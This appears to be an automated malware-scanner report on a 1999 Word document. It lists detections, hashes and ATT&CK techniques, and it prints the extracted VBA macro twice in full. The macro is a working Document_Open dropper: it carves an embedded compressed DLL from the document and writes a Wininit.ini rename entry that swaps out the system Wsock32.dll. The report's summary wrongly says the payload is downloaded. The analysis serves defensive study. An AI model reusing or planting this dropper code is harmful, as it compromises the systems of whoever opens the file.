Office (OLE) malware analysis — malicious · cdbf19f3259e997d

MALICIOUS

Office (OLE)

38.1 KB Created: 1999-07-28 08:02:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: ac725babfd58ee5f29161ab52396c09d SHA-1: 1b262245e859ff506dd9e37737156b17bcd4561f SHA-256: cdbf19f3259e997d0758dbe233e0689a4b728c7b6c37dd0528e9bcc1f5e9f3ef

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OLE document with a high-severity heuristic indicating the presence of VBA macros, specifically a Document_Open macro. The ClamAV detection further confirms its malicious nature. The VBA script contains numerous API calls to KERNEL32 and LZ32, suggesting it is designed to download and execute a secondary payload, a common technique for malware droppers.

Heuristics 3

ClamAV: Doc.Dropper.Agent-6571561-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6571561-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9816 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9816 bytes
SHA-256: `2c2f9437fab78d97bfabb62b1ed6f42a7fd17cd0c9f4990486e7ffad9d70540b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Declare Sub GetWindowsDirectoryA Lib "KERNEL32" (ByVal s As String, ByVal l As Long) Private Declare Sub GetSystemDirectoryA Lib "KERNEL32" (ByVal s As String, ByVal l As Long) Private Declare Sub CopyFileA Lib "KERNEL32" (ByVal src As String, ByVal dst As String, ByVal mode As Long) Private Declare Function GetFileAttributesA Lib "KERNEL32" (ByVal s As String) As Long Private Declare Sub lstrcatA Lib "KERNEL32" (ByVal dst As String, ByVal src As String) Private Declare Function lstrlenA Lib "KERNEL32" (ByVal s As String) As Long Private Declare Function LZOpenFileA Lib "LZ32" (ByVal s As String, ByVal o As String, ByVal mode As Long) As Long Private Declare Sub LZCopy Lib "LZ32" (ByVal src As Long, ByVal dst As Long) Private Declare Sub LZClose Lib "LZ32" (ByVal h As Long) Private Declare Function OpenFile Lib "KERNEL32" Alias "_lopen" (ByVal s As String, ByVal mode As Long) As Long Private Declare Function CreateFile Lib "KERNEL32" Alias "_lcreat" (ByVal s As String, ByVal attr As Long) As Long Private Declare Sub SeekFile Lib "KERNEL32" Alias "_llseek" (ByVal h As Long, ByVal ofs As Long, ByVal fw As Long) Private Declare Sub ReadFile Lib "KERNEL32" Alias "_lread" (ByVal h As Long, ByVal ptr As Long, ByVal n As Long) Private Declare Sub WriteFile Lib "KERNEL32" Alias "_lwrite" (ByVal h As Long, ByVal ptr As Long, ByVal n As Long) Private Declare Sub WriteFile1 Lib "KERNEL32" Alias "_lwrite" (ByVal h As Long, ByVal ptr As String, ByVal n As Long) Private Declare Sub CloseFile Lib "KERNEL32" Alias "_lclose" (ByVal h As Long) Private Declare Function GlobalAlloc Lib "KERNEL32" (ByVal fl As Long, ByVal n As Long) As Long Private Declare Sub GlobalFree Lib "KERNEL32" (ByVal ptr As Long) Private Sub Document_Open() If InStr(1, System.OperatingSystem, "Windows") <> 0 Then Dim ws1 As String, ws2 As String ws1 = String(256, "X") GetSystemDirectoryA ws1, 256 ws2 = ws1 lstrcatA ws1, "\Wsock32.dll" lstrcatA ws2, "\Wsock33.dll" If GetFileAttributesA(ws2) = -1 Then Dim ai As String, dt1 As String, dt2 As String, wi As String Dim h As Long, g As Long, p As Long, ofs1 As String, ofs2 As String Dim w As String ai = ws1 GetWindowsDirectoryA ai, 256 dt1 = ai dt2 = ai wi = ai ofs1 = ai ofs2 = ai lstrcatA ai, "\Anthrax.ini" lstrcatA dt1, "\DLL.lzh" lstrcatA dt2, "\DLL.tmp" lstrcatA wi, "\Wininit.ini" CopyFileA ActiveDocument.FullName, ai, 0 p = GlobalAlloc(0, 6712) h = OpenFile(ai, 0) SeekFile h, 32256, 0 ReadFile h, p, 6712 CloseFile h h = CreateFile(dt1, 0) WriteFile h, p, 6712 CloseFile h GlobalFree (ptr) h = LZOpenFileA(dt1, ofs1, 0) g = LZOpenFileA(dt2, ofs2, 4096) LZCopy h, g LZClose g LZClose h w = "[rename]" & Chr(13) & Chr(10) & "nul=" & String(1010, 0) lstrcatA w, dt1 lstrcatA w, Chr(13) & Chr(10) & Chr(0) lstrcatA w, ws2 lstrcatA w, "=" lstrcatA w, ws1 lstrcatA w, Chr(13) & Chr(10) & Chr(0) lstrcatA w, ws1 lstrcatA w, "=" lstrcatA w, dt2 h = CreateFile(wi, 0) WriteFile1 h, w, lstrlenA(w) CloseFile h End If End If End Sub ' Processing file: /opt/analyzer/scan_staging/893dbb88d4e34cff8f3f6d1b4b16add8.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 7718 bytes ' Line #0: ' FuncDefn (Private Declare Sub GetWindowsDirectoryA Lib "KERNEL32" (ByVal s As String, ByVal l As Long)) ' Line #1: ' FuncDefn (Private Declare Sub GetSystemDirectoryA Lib "KERNEL32" (ByVal s As String, ByVal l As Long)) ' Line #2: ' FuncDefn (Private Declare Sub CopyFileA Lib "KERNEL32" (ByVal src As String, ByVal dst As String, ByVal mode As Long)) ' Line #3: ' FuncDefn (Private Declare Function GetFileAttributesA Lib "KERNEL32" (ByVal s As String) As Long) ' Line #4: ' FuncDefn (Private Declare Sub lstrcatA Lib "KERNEL32" (ByV ... (truncated)

SHA-256: 2c2f9437fab78d97bfabb62b1ed6f42a7fd17cd0c9f4990486e7ffad9d70540b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Sub GetWindowsDirectoryA Lib "KERNEL32" (ByVal s As String, ByVal l As Long)
Private Declare Sub GetSystemDirectoryA Lib "KERNEL32" (ByVal s As String, ByVal l As Long)
Private Declare Sub CopyFileA Lib "KERNEL32" (ByVal src As String, ByVal dst As String, ByVal mode As Long)
Private Declare Function GetFileAttributesA Lib "KERNEL32" (ByVal s As String) As Long
Private Declare Sub lstrcatA Lib "KERNEL32" (ByVal dst As String, ByVal src As String)
Private Declare Function lstrlenA Lib "KERNEL32" (ByVal s As String) As Long
Private Declare Function LZOpenFileA Lib "LZ32" (ByVal s As String, ByVal o As String, ByVal mode As Long) As Long
Private Declare Sub LZCopy Lib "LZ32" (ByVal src As Long, ByVal dst As Long)
Private Declare Sub LZClose Lib "LZ32" (ByVal h As Long)
Private Declare Function OpenFile Lib "KERNEL32" Alias "_lopen" (ByVal s As String, ByVal mode As Long) As Long
Private Declare Function CreateFile Lib "KERNEL32" Alias "_lcreat" (ByVal s As String, ByVal attr As Long) As Long
Private Declare Sub SeekFile Lib "KERNEL32" Alias "_llseek" (ByVal h As Long, ByVal ofs As Long, ByVal fw As Long)
Private Declare Sub ReadFile Lib "KERNEL32" Alias "_lread" (ByVal h As Long, ByVal ptr As Long, ByVal n As Long)
Private Declare Sub WriteFile Lib "KERNEL32" Alias "_lwrite" (ByVal h As Long, ByVal ptr As Long, ByVal n As Long)
Private Declare Sub WriteFile1 Lib "KERNEL32" Alias "_lwrite" (ByVal h As Long, ByVal ptr As String, ByVal n As Long)
Private Declare Sub CloseFile Lib "KERNEL32" Alias "_lclose" (ByVal h As Long)
Private Declare Function GlobalAlloc Lib "KERNEL32" (ByVal fl As Long, ByVal n As Long) As Long
Private Declare Sub GlobalFree Lib "KERNEL32" (ByVal ptr As Long)
Private Sub Document_Open()
If InStr(1, System.OperatingSystem, "Windows") <> 0 Then
Dim ws1 As String, ws2 As String
ws1 = String(256, "X")
GetSystemDirectoryA ws1, 256
ws2 = ws1
lstrcatA ws1, "\Wsock32.dll"
lstrcatA ws2, "\Wsock33.dll"
If GetFileAttributesA(ws2) = -1 Then
Dim ai As String, dt1 As String, dt2 As String, wi As String
Dim h As Long, g As Long, p As Long, ofs1 As String, ofs2 As String
Dim w As String
ai = ws1
GetWindowsDirectoryA ai, 256
dt1 = ai
dt2 = ai
wi = ai
ofs1 = ai
ofs2 = ai
lstrcatA ai, "\Anthrax.ini"
lstrcatA dt1, "\DLL.lzh"
lstrcatA dt2, "\DLL.tmp"
lstrcatA wi, "\Wininit.ini"
CopyFileA ActiveDocument.FullName, ai, 0
p = GlobalAlloc(0, 6712)
h = OpenFile(ai, 0)
SeekFile h, 32256, 0
ReadFile h, p, 6712
CloseFile h
h = CreateFile(dt1, 0)
WriteFile h, p, 6712
CloseFile h
GlobalFree (ptr)
h = LZOpenFileA(dt1, ofs1, 0)
g = LZOpenFileA(dt2, ofs2, 4096)
LZCopy h, g
LZClose g
LZClose h
w = "[rename]" & Chr(13) & Chr(10) & "nul=" & String(1010, 0)
lstrcatA w, dt1
lstrcatA w, Chr(13) & Chr(10) & Chr(0)
lstrcatA w, ws2
lstrcatA w, "="
lstrcatA w, ws1
lstrcatA w, Chr(13) & Chr(10) & Chr(0)
lstrcatA w, ws1
lstrcatA w, "="
lstrcatA w, dt2
h = CreateFile(wi, 0)
WriteFile1 h, w, lstrlenA(w)
CloseFile h
End If
End If
End Sub




' Processing file: /opt/analyzer/scan_staging/893dbb88d4e34cff8f3f6d1b4b16add8.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 7718 bytes
' Line #0:
' 	FuncDefn (Private Declare Sub GetWindowsDirectoryA Lib "KERNEL32" (ByVal s As String, ByVal l As Long))
' Line #1:
' 	FuncDefn (Private Declare Sub GetSystemDirectoryA Lib "KERNEL32" (ByVal s As String, ByVal l As Long))
' Line #2:
' 	FuncDefn (Private Declare Sub CopyFileA Lib "KERNEL32" (ByVal src As String, ByVal dst As String, ByVal mode As Long))
' Line #3:
' 	FuncDefn (Private Declare Function GetFileAttributesA Lib "KERNEL32" (ByVal s As String) As Long)
' Line #4:
' 	FuncDefn (Private Declare Sub lstrcatA Lib "KERNEL32" (ByV
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.